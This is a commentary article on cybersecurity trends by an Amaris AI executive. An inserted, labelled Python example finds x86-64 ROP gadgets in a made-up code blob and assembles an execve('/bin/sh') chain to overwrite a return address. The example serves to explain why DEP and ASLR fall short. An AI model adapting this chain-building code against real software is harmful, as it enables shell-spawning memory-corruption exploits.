By Prof Yu Chien Siang
Prof Yu Chien Siang, Chief Innovation & Trust Officer (CITO) at Amaris AI. (Photo: Prof Yu Chien Siang)
Cybersecurity damage is projected to cost the world US$6 trillion annually by 2021. Steve Morgan, founder and editor-in-chief of Cybersecurity Ventures – a US-based researcher and publisher that covers the global cyber economy – believes that cybercriminal activity will be one of the biggest challenges that we will face in the next two decades.
Cybersecurity Ventures also predicts that the damage costs arising from ransomware attacks will rise to US$11.5 billion in 2019, and that by then a business will fall victim to a ransomware attack every 14 seconds.
So what does this mean? It means we urgently need to beef up and advance our cybersecurity efforts and technologies.
There are currently two strong trends in the cybersecurity landscape – cloud application security and exploiting the internet via pervasive computing.
Firstly, cloud application security has become more important than ever, due to the steady migration of many enterprise systems to public cloud providers such as Amazon Web Services and Google Cloud.
Although cloud infrastructure security has been maturing rapidly and has typically been good, cloud-based applications, with their possible security flaws and bugs, remain the Achilles' heel of enterprise security. Importantly, there has been little success so far in solving this problem, and thus we are plagued with constant code patching whenever software vulnerabilities are discovered.
Platform countermeasures such as DEP (Data Execution Prevention, which relies on the processor's no-execute bit) and ASLR (Address Space Layout Randomisation) raise the bar but do not close the door. ROP (Return-Oriented Programming) and JOP (Jump-Oriented Programming) chain together fragments of code that are already present and executable, so DEP never has to be violated; a single information leak reveals where those fragments have been loaded, which defeats ASLR. Coupled with fileless attack techniques that leave no malicious binary on disk, such attacks get past these defences.
Consequently, enterprises have to resort to expensive penetration testing and code examination, which cannot scale and will never be agile. Penetration testing cannot discover all of the vulnerabilities present, and code examination requires too many hours and eyeballs from software coding experts who, despite their best efforts, can still miss defects that reside in drivers or are hidden behind complex dependencies, for example.
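To make the ROP point concrete, here is an added example that is not part of the original article: a minimal x86-64 gadget finder and chain builder in the style of tools such as ROPgadget. It scans a code blob for short instruction sequences ending in `ret`, then assembles the classic `execve` chain from whatever it finds. The code blob, the handful of instruction encodings it recognises, the load address and the address of a `/bin/sh` string are all constructed for the example (a real tool disassembles a binary's `.text` section with a full disassembler). Nothing is executed; the output is the list of addresses an attacker would write over a saved return address, which is exactly why DEP does not help and why ASLR only helps until the base address leaks.

```python
"""Toy x86-64 ROP gadget finder and execve chain builder (illustrative, not from the article)."""
import struct

# Instruction encodings this toy scanner understands (real tools use a full
# disassembler such as capstone).  Assumed for the example; all are genuine
# x86-64 encodings.
KNOWN = {
    b"\x5f": "pop rdi",
    b"\x5e": "pop rsi",
    b"\x5a": "pop rdx",
    b"\x58": "pop rax",
    b"\x0f\x05": "syscall",
}
RET = 0xC3
EXECVE_SYSCALL = 59  # Linux x86-64 syscall number for execve

# Constructed stand-in for an executable .text section.  Note that the
# useful gadgets are fragments of ordinary code, not injected shellcode.
CODE = (
    b"\x55\x48\x89\xe5"      # push rbp; mov rbp, rsp  (prologue, no gadget)
    b"\x5f\xc3"              # pop rdi; ret
    b"\x90\x90"              # nop; nop
    b"\x5e\x5a\xc3"          # pop rsi; pop rdx; ret
    b"\xcc"                  # int3
    b"\x58\xc3"              # pop rax; ret
    b"\x0f\x05\xc3"          # syscall; ret
    b"\xc3"                  # lone ret (ignored: no instruction before it)
)


def find_gadgets(code: bytes, base: int = 0x400000, depth: int = 3) -> dict:
    """Map address -> "insn; ...; ret" for every gadget in `code`.

    For each `ret` byte, walk backwards up to `depth` instructions, accepting
    only encodings in KNOWN.  Every suffix of a longer gadget is itself a
    gadget starting at a later address, so each step is recorded.
    """
    gadgets = {}
    encodings = sorted(KNOWN, key=len, reverse=True)  # longest match first
    for i, byte in enumerate(code):
        if byte != RET:
            continue
        insns = []
        pos = i
        for _ in range(depth):
            for enc in encodings:
                n = len(enc)
                if pos >= n and code[pos - n:pos] == enc:
                    insns.insert(0, KNOWN[enc])
                    pos -= n
                    gadgets[base + pos] = "; ".join(insns + ["ret"])
                    break
            else:
                break  # nothing recognisable before this point
    return gadgets


def build_execve_chain(code: bytes, base: int, binsh_addr: int) -> list:
    """Return the stack qwords for execve("/bin/sh", NULL, NULL) via gadgets.

    `base` is where the code is loaded; under ASLR the attacker must learn it
    from a leak, otherwise every address below is wrong.
    """
    by_text = {text: addr for addr, text in find_gadgets(code, base).items()}
    needed = ["pop rdi; ret", "pop rsi; pop rdx; ret", "pop rax; ret", "syscall; ret"]
    missing = [g for g in needed if g not in by_text]
    if missing:
        raise ValueError(f"no gadget for: {missing}")
    return [
        by_text["pop rdi; ret"], binsh_addr,          # rdi = "/bin/sh"
        by_text["pop rsi; pop rdx; ret"], 0, 0,       # rsi = argv = NULL, rdx = envp = NULL
        by_text["pop rax; ret"], EXECVE_SYSCALL,      # rax = 59
        by_text["syscall; ret"],
    ]


def pack_chain(chain: list) -> bytes:
    """Serialise the chain as little-endian qwords, as it would sit on the stack."""
    return struct.pack("<" + "Q" * len(chain), *chain)


if __name__ == "__main__":
    for addr, text in sorted(find_gadgets(CODE).items()):
        print(f"{addr:#x}: {text}")
    chain = build_execve_chain(CODE, base=0x400000, binsh_addr=0x601000)
    print([hex(q) for q in chain])
    print(len(pack_chain(chain)), "bytes to write past the saved return address")
```

Running it with a different `base` shifts every gadget address by the same amount, which is the whole of what ASLR buys: the chain is identical up to that offset, so one leaked code pointer is enough to rebuild it.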
Secondly, the drive to develop our Smart Nation is itself a digital transformation to exploit the Internet via pervasive computing.
As a result, we will see the emergence of new threats evolving from the use of artificial intelligence, the introduction of the Industrial Internet of Things, and the possible subversion of robots and drones as these become connected to the Internet. One nightmare scenario would involve the mass hacking of every smart power meter in Singapore, allowing the attacker to cut the electricity supply to all homes and factories.
Unfortunately, we have not yet seen defensive ideas like security by design, privacy by design and resilient design gaining much traction. This is an area that is not well researched by our universities, and the know-how of how to do things right from the start and how to maintain robust IT operations is restricted to only a handful of larger companies, such as Netflix.
Without a strong defensive architecture, important smart nation systems may be eventually subjected to cyber subversion. We should expect attacks to come, fast and furious, as the stakes become higher.
I also suspect that many software developers still do not understand how to design robust IT systems. They also do not have the automated tools to design the secure systems that are needed. Our IT leaders would need to be more technical, to truly understand the new threat landscape and to get their development teams to adopt new systems development methodologies that will integrate cyber security during the design phase.
Even Chief Information Security Officers (CISO) of organisations here may not have been formally trained and hence, may not know what needs to be done.
In Israel, the CISOs need to attend six weeks of intensive training at an academy, and like in the armed forces, a combatant officer should at least be armed with the basic knowledge and skills to do his job. Cyber security is no different from military defence, and we should devote more professional development to this important sector.
To boost cybersecurity efforts, companies and users should always ensure that they have the means to know how best to respond if and when there is a security breach. Visibility is key to enterprise security, which includes knowing how existing defences are coping with ongoing attacks and how the attackers are improving themselves.
Sometimes, this means that companies must look for professional help and, if the systems are weak, they may need to see the “doctor” (cyber security specialists) or visit the “hospital” (cyber security monitoring company) before their condition becomes fatal.
Prof Yu Chien Siang is the Chief Innovation & Trust Officer (CITO) of Amaris AI.